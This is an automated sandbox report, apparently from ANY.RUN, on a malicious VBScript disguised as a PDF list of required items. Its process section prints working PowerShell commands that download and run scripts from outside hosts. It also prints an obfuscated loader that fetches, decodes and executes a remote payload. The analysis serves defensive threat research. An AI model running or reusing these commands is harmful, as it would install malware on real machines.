File name:

Listofrequireditemsandservicespdf.vbs

Full analysis: https://app.any.run/tasks/46a1ff9e-7920-461f-9798-b542e7fa719c
Verdict: Malicious activity
Analysis date: December 09, 2024, 17:51:10
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (2731), with CRLF line terminators
MD5:

32AABCE75F3FD75D0ECF7743BC6B9AFF

SHA1:

0F715B1CEAFEDDD4C80B294E91EC476AE3E8C0D0

SHA256:

21BEB442551B46EFBB7727A20784E6F047B4321DD3D8CCFCA94C256B9AD6E0BE

SSDEEP:

48:TJafb+vKVySHj3lS+Dkh1SFFMS1SBc24LlSMBbuSBlSMCSwVERbuSBBUS1R+nK:W6KjIXGno0nuSb+K

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 4128)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 5728)
      • wscript.exe (PID: 3688)

    • Likely accesses (executes) a file from the Public directory

      • powershell.exe (PID: 1668)
      • wscript.exe (PID: 3688)
      • EXCEL.EXE (PID: 1224)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5728)
      • wscript.exe (PID: 3688)

    • Starts process via Powershell

      • powershell.exe (PID: 1668)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 1668)

    • The process executes VB scripts

      • powershell.exe (PID: 1668)

    • Uses WMIC.EXE to obtain physical disk drive information

      • wscript.exe (PID: 3688)

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 3688)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 4244)

    • Connects to unusual port

      • svchost.exe (PID: 4976)

    • The process checks if it is being run in the virtual environment

      • svchost.exe (PID: 4976)

  • INFO

    • The process uses the downloaded file

      • wscript.exe (PID: 5728)
      • powershell.exe (PID: 1668)

    • Disables trace logs

      • powershell.exe (PID: 1668)
      • powershell.exe (PID: 4128)

    • Checks proxy server information

      • powershell.exe (PID: 1668)
      • powershell.exe (PID: 4128)
      • msiexec.exe (PID: 2260)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 2324)
      • msiexec.exe (PID: 2260)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 3688)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4128)
      • powershell.exe (PID: 4244)

    • Manual execution by a user

      • powershell.exe (PID: 4244)
      • svchost.exe (PID: 4976)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4244)
      • powershell.exe (PID: 4128)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4244)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4244)

    • Reads the software policy settings

      • msiexec.exe (PID: 2260)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
13
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs wscript.exe no specs wmic.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs excel.exe msiexec.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
1224"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\lsm5k8gou5bjv.xlsx"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
1668"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2260"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
2324wmic diskdrive get caption,serialnumberC:\Windows\System32\wbem\WMIC.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2972\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3688"C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" C:\Windows\System32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3816\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3848\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3952\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4128"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelButK ePhsCr1M 9 T1') ;Allestedsnrvrende $Linievogternes;Allestedsnrvrende (ectethmoid 'SesLiT,eAForC.TPl-SgSEllSaE,ve nPEm I 4');Allestedsnrvrende (ectethmoid 'Ko$ ,GellBaoAvBJoaFrl p:S cUdI VBlI llnobR EUdSknk By otTrtSteLaLThSToE s G=Tr(M.T TETesCotUn-,lpFuaFatToh i Re$O.bPeEB.g YMen DDBoeS LN SG.EC s LVii on ojI ESkRliN .e B1As0F.9Ar)') ;Allestedsnrvrende (ectethmoid ' M$JeG RLU.oSybBiA .LTi: JrAlE GKoI.lsAftnirSuEScrB.iHinHoGOpSUnNS UEnMA MAreSpr.us F=En$M,G iLNooLgb nA.alM.:J KFlNNeu aB .SLiE.o+Ru+ r%Un$ NSP VFoiUnNMee SUn. CCaoG Ud NInt') ;$agreed=$Svines[$Registreringsnummers]}$Djvelskabers=282895;$Unpreparedness=28214;Allestedsnrvrende (ectethmoid 'H $ChGafL OH,bRaa ,l.e:BoSHeH ,yDylOpOBoC ek TeS d I sa=K igEkE BtH - FCDooRenInt FeIln HtCr Ti$FiB Nep,gU yE NTaDB E Il BSIneM,SLel LiMinI j.aeA.RFrNAne,u1.g0Ge9');Allestedsnrvrende (ectethmoid 'Pr$ g Dl,oo BbNaaPslRe:poD AdSvnS iCan,ygtje ,n W ,d=Un k[AfSIsy .sInt EeM mSk. SCBao an LvB eTyrmotE ]Ma:Bo: MF Fr ,oPhm BA asesHuePr6Ma4KrSKotCrr .i.unA.gS.(Co$,aSS hhyyG lMoosycRek ee adOv)');Allestedsnrvrende (ectethmoid 'Pa$Hjg BlD,o FB,nALalOc: ,kDka.inBut HsC.TPoeO n eLonEfS i Bo= I M,[FossaYFeSUnt EUnMCo.KaT.ee .xChTG .,deGrNReCBoOPrd .iR ND G ] F:.a: HaReS.ac EIchIGr.l gTleStt s Ct eRVeiF n fg.a(Fo$HiDFrdAlnAnI,eNcrgpoEDinhy)');Allestedsnrvrende (ectethmoid 'Ca$,ogbol eOMoBXaA CLMa:m tmaI ,lErSBrKStA dAiEA,KP O UmDaNEpeMo=F $EgKSeaHjN nT S eT PeRon Be,lnWasth. iS eUU BS sAltCorR iStn MGS (Fo$PedInjDav E ClM sSekEmaU.B GeFlRDiSBu,Sa$Beu NnUnpB,rGae,np EA Fr.eE iDErNEne .sM Ssn)');Allestedsnrvrende $Tilskadekomne;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events
33 100
Read events
32 854
Write events
225
Delete events
21

Modification events

(PID) Process:(1668) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(1668) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value:
0100000000000000D3818DFE624ADB01
(PID) Process:(1668) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Operation:writeName:Excel.Sheet.12
Value:
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:1
Value:
01D014000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\1224
Operation:writeName:0
Value:
0B0E106365FD851A500D41B6AE2FD715A3D663230046B2D5E695B0CCD2ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511C809D2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(1224) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
Executable files
1
Suspicious files
16
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
1668powershell.exeC:\Users\Public\udkz59n9.vbstext
MD5:08450E7F899444A80F64E7AEFEBDC278
SHA256:E4801D7FB5B9EB28FB32971B2935FB6A22EEC84F892FA724EDB5E6586110B507
4128powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_piwvxdxm.3lo.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4128powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:5FC9862ED736A8FAD361C671F913ACA8
SHA256:434E774E0F8B077C64EBA3ABCB47C8A73EA98B963B91259D4E18E3E9D99C978B
1668powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aswrxrjl.ay5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4128powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kkxp1nne.y0l.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4128powershell.exeC:\Users\admin\AppData\Roaming\Exultet.Bidtext
MD5:1C8EEA62BA17FC6DBA580BF2838B9E5A
SHA256:1B924838E7940222DCC7E76C15139882D57D0C0A3F3E8D14BA5C370EA5C8708F
1668powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_taqru0hi.lxe.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1224EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CF0C706C-BA7E-4CD5-9AAB-AE4FA5076384xml
MD5:8113C711AFF492D2A716A27DDB6ED1E5
SHA256:F97FE5D63648DB936B3B8A34D140EFE411DA991C77769C5B287F2BB447773292
1224EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:1D950761921920766E7432100CAFE750
SHA256:0B91674674AF5002E186BD2EBF6BB23CDF8D5E64CE40FE92043419264E98EA5F
4244powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5poqupwn.jgu.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
17
TCP/UDP connections
39
DNS requests
15
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.24.77.35:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2220
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
HEAD
200
23.32.100.39:443
https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
unknown
GET
200
52.113.194.132:443
https://ecs.office.com/config/v2/Office/excel/16.0.16026.20146/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.16026.20146&MsoVersion=16.0.16026.20002&SDX=fa000000002.2.0.1907.31003&SDX=fa000000005.1.0.1909.30011&SDX=fa000000006.1.0.1909.13002&SDX=fa000000008.1.0.1908.16006&SDX=fa000000009.1.0.1908.6002&SDX=fa000000016.1.0.1810.13001&SDX=fa000000029.1.0.1906.25001&SDX=fa000000033.1.0.1908.24001&SDX=wa104381125.1.0.1810.9001&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=6&LicenseSKU=Professional2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7b85FD6563-501A-410D-B6AE-2FD715A3D663%7d&LabMachine=false
unknown
tss
370 Kb
whitelisted
GET
200
52.109.76.240:443
https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3
unknown
xml
177 Kb
whitelisted
GET
200
209.124.66.28:443
https://www.tequila.ae/wh/wh.vbs
unknown
text
32.2 Kb
GET
200
93.95.216.175:443
https://www.fornid.com/ab/List%20of%20required%20items.xlsx
unknown
document
7.91 Kb
GET
200
103.53.42.63:443
https://www.ftsengineers.com/it/Emnernes123.mdp
unknown
text
405 Kb
GET
200
52.111.236.4:443
https://messaging.lifecycle.office.com/getcustommessage16?app=1&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7B85FD6563-501A-410D-B6AE-2FD715A3D663%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofsh6c2b1tla1a31%2Cofcrui4yvdulbf31%2Cofhpex3jznepoo31%2Cofpioygfqmufst31%2Cofaa1msspvo2xw31%22%7D
unknown
text
542 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2220
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
184.24.77.35:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2220
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1668
powershell.exe
209.124.66.28:443
www.tequila.ae
A2HOSTING
US
unknown
3976
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
google.com
  • 172.217.16.142
whitelisted
crl.microsoft.com
  • 184.24.77.35
  • 184.24.77.12
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
www.tequila.ae
  • 209.124.66.28
unknown
www.ftsengineers.com
  • 103.53.42.63
unknown
www.fornid.com
  • 93.95.216.175
unknown
officeclient.microsoft.com
  • 52.109.76.240
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.4
whitelisted

Threats

PID
Process
Class
Message
4976
svchost.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 5
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Listofrequireditemsandservicespdf.vbs